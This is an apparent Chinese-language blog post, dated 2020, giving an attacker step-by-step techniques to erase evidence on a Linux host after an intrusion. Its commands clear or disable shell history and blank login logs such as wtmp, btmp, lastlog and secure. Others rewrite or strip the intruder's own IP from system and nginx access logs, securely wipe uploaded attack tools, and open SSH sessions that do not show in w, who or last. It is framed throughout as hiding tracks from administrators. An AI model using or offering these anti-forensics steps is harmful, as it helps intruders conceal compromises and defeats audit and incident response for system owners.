Linux 入侵痕跡清理技巧
阿新 • • 發佈:2020-09-10
在攻擊結束後,如何不留痕跡的清除日誌和操作記錄,以掩蓋入侵蹤跡,這其實是一個細緻的技術活。你所做的每一個操作,都要被抹掉;你所上傳的工具,都應該被安全地刪掉。
01、清除history歷史命令記錄
檢視歷史操作命令:
檢視歷史操作命令:history
history記錄檔案:more ~/.bash_history
第一種方式:
(1)編輯history記錄檔案,刪除部分不想被儲存的歷史命令。
vim ~/.bash_history
(2)清除當前使用者的history命令記錄
history -c
第二種方式:
(1)利用vim特性刪除歷史命令
#使用vim開啟一個檔案 vi test.txt # 設定vim不記錄命令,Vim會將命令歷史記錄,儲存在viminfo檔案中。 :set history=0 # 用vim的分屏功能開啟命令記錄檔案.bash_history,編輯檔案刪除歷史操作命令 vsp ~/.bash_history # 清楚儲存.bash_history檔案即可。
(2)在vim中執行自己不想讓別人看到的命令
:set history=0 :!command
第三種方式:
通過修改配置檔案/etc/profile,使系統不再儲存命令記錄。
HISTSIZE=0
第四種方式:
登入後執行下面命令,不記錄歷史命令(.bash_history)
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
02、清除系統日誌痕跡
Linux 系統存在多種日誌檔案,來記錄系統執行過程中產生的日誌。
/var/log/btmp 記錄所有登入失敗資訊,使用lastb命令檢視 /var/log/lastlog 記錄系統中所有使用者最後一次登入時間的日誌,使用lastlog命令檢視 /var/log/wtmp 記錄所有使用者的登入、登出資訊,使用last命令檢視 /var/log/utmp 記錄當前已經登入的使用者資訊,使用w,who,users等命令檢視 /var/log/secure 記錄與安全相關的日誌資訊 /var/log/message 記錄系統啟動後的資訊和錯誤日誌
第一種方式:清空日誌檔案
清除登入系統失敗的記錄:
[root@centos]# echo > /var/log/btmp [root@centos]# lastb //查詢不到登入失敗資訊
清除登入系統成功的記錄:
[root@centos]# echo > /var/log/wtmp [root@centos]# last //查詢不到登入成功的資訊
清除相關日誌資訊:
清除使用者最後一次登入時間:echo > /var/log/lastlog #lastlog命令 清除當前登入使用者的資訊:echo > /var/log/utmp #使用w,who,users等命令 清除安全日誌記錄:cat /dev/null > /var/log/secure 清除系統日誌記錄:cat /dev/null > /var/log/message
第二種方式:刪除/替換部分日誌
日誌檔案全部被清空,太容易被管理員察覺了,如果只是刪除或替換部分關鍵日誌資訊,那麼就可以完美隱藏攻擊痕跡。
# 刪除所有匹配到字串的行,比如以當天日期或者自己的登入ip sed -i '/自己的ip/'d /var/log/messages # 全域性替換登入IP地址: sed -i 's/192.168.166.85/192.168.1.1/g' secure
03、清除web入侵痕跡
第一種方式: 直接替換日誌ip地址
sed -i 's/192.168.166.85/192.168.1.1/g' access.log
第二種方式:清除部分相關日誌
# 使用grep -v來把我們的相關資訊刪除, cat /var/log/nginx/access.log | grep -v evil.php > tmp.log # 把修改過的日誌覆蓋到原日誌檔案 cat tmp.log > /var/log/nginx/access.log/
04、檔案安全刪除工具
(1)shred命令
實現安全的從硬碟上擦除資料,預設覆蓋3次,通過 -n指定資料覆蓋次數。
[root@centos]# shred -f -u -z -v -n 8 1.txt shred: 1.txt: pass 1/9 (random)... shred: 1.txt: pass 2/9 (ffffff)... shred: 1.txt: pass 3/9 (aaaaaa)... shred: 1.txt: pass 4/9 (random)... shred: 1.txt: pass 5/9 (000000)... shred: 1.txt: pass 6/9 (random)... shred: 1.txt: pass 7/9 (555555)... shred: 1.txt: pass 8/9 (random)... shred: 1.txt: pass 9/9 (000000)... shred: 1.txt: removing shred: 1.txt: renamed to 00000 shred: 00000: renamed to 0000 shred: 0000: renamed to 000 shred: 000: renamed to 00 shred: 00: renamed to 0 shred: 1.txt: removed
(2)dd命令
可用於安全地清除硬碟或者分割槽的內容。
dd if=/dev/zero of=要刪除的檔案 bs=大小 count=寫入的次數
(3)wipe
Wipe 使用特殊的模式來重複地寫檔案,從磁性介質中安全擦除檔案。
wipe filename
(4)Secure-Delete
Secure-Delete 是一組工具集合,提供srm、smem、sfill、sswap,4個安全刪除檔案的命令列工具。
srm filename sfill filename sswap /dev/sda1 smem
05、隱藏遠端SSH登陸記錄
隱身登入系統,不會被w、who、last等指令檢測到。
ssh -T root@192.168.0.1 /bin/bash -i
不記錄ssh公鑰在本地.ssh目錄中
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i